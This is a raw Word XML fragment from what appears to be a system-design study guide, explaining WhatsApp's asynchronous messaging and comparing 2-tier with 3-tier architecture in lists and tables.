          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kafka, RabbitMQ) for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xml:space="preserve"> processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65206F1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DF6D9">
          <v:rect id="_x0000_i3890" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851E8D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1339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5ECCDA0B" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695D8D9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ask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="450EAB4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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="0EEC3C2F" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D5B461"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ey debit/credit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6875EC0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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5BD3A2F0" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CD8BA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ing notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437432F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0F38B124" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="611ECB65"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ging/Auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="756DC558"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6CF2BFF5" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF0626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aud detection post-check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFC0FB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bl>
    <w:p w14:paraId="209362E3" w14:textId="3464D324"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3891" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D774FD" w14:textId="1089981F" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="006F290C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="961" w:name="_Toc197868175"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is WhatsApp Synchronous or Asynchronous</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="961"/>
    </w:p>
    <w:p w14:paraId="6C1D5D88" w14:textId="1AB5C0AC"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atsApp</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as the core mechanism for messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A1AB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3D3C9">
          <v:rect id="_x0000_i3892" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C000FD6"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Asynchronous?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C5C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w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a message to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21EF8E"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essage is sent to WhatsApp servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFD209"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queued and delivered</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to User B </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when they're online</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405966A1"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need for User B to be instantly available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C313A4"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r A doesn’t wait for a response to continue — </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D55CA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0A1BB">
          <v:rect id="_x0000_i3893" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250905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3789"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3D71D1A5" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37BD53D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7546EFFE"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="15FFD69E" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52846FD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 sends a message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC3A7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t via internet (asynchronously)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7642FD4D" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D931A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e reaches server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3153C89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ored until recipient is available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1B9083C6" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FC78E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elivery status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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB5CD4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knowledges delivery &amp; read, also async</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7EAB525A" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="121BF3C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cipient reads/responds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556429F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their convenience — no blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D83548A"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695D">
          <v:rect id="_x0000_i3894" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EDFC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Features in WhatsApp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB2D6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ffline message handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273ABC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ush notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D3ED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ultimedia sharing (uploads/downloads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110609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 chats with multiple recipients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55B02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Desktop sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53D6AF"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BD3E1">
          <v:rect id="_x0000_i3895" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FBD7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271"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1DB9CCBD" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F5039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297343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Async</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="48D6F283" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF02415"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ing core</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A5270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64EA0F0C" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7922638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dia uploads/downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="375221D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14C46B63" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="025031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yping indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5989C12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0FF2AA40" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E587A7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deo/Voice call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="336049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 (Real-time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73C82746" w14:textId="0B8E9F5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3896" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55C7BD" w14:textId="773301A7" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00B5508A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="962" w:name="_Toc197868176"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between 2 Tier and 3 Tier Architecture</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="962"/>
    </w:p>
    <w:p w14:paraId="16DFD48B" w14:textId="69D510B1" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between 2-tier and 3-tier architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9A560"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6CE71">
          <v:rect id="_x0000_i3897" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A1549"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Tier Architecture (Client–Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F815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6760B43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Presentation + Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EDF61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Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05FFC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A desktop application connecting directly to a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103377E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218C7CC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 + Logic) &lt;--&gt; Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B317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4DC64A6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impler to build and deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21EC0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aster for small applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6967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39C3865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or scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06BDC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ght coupling between client and database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA8D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 concerns due to direct DB access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780CC328"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8A7AEC">
          <v:rect id="_x0000_i3898" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA7CF84"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Tier Architecture (Presentation–Logic–Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0C9B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20D6D48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sentation Layer (Client/UI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA5479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siness Logic Layer (Application Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB85D4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Layer (Database Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE006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Web app with Angular (UI) → Spring Boot (API) → PostgreSQL (DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FBA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0C632BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539174A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0E35351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 (Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A416D1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2B031A1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base Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CE58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56CE71F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 scalability and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F5F4B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 separation enables easier upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA7D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re secure (no direct DB access from UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B603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1387F72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more complex to set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62224C4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quires good coordination between layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5B602"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AA093">
          <v:rect id="_x0000_i3899" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B43F9F"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359"/>
        <w:gridCol w:w="2312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="613F19B9" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32F988E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A0522F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Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="221A2D0D"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Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="4FB9FCF5" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCAAB6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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161F003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 Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E57F76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I + Logic + DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="542D0FEE" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2A301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siness Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46841AE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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508F85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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6C07CC5C" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FC8F8D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rect DB Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0073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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="786C41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t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="4F193A34" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0237DA6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C1D04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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5FCBC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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
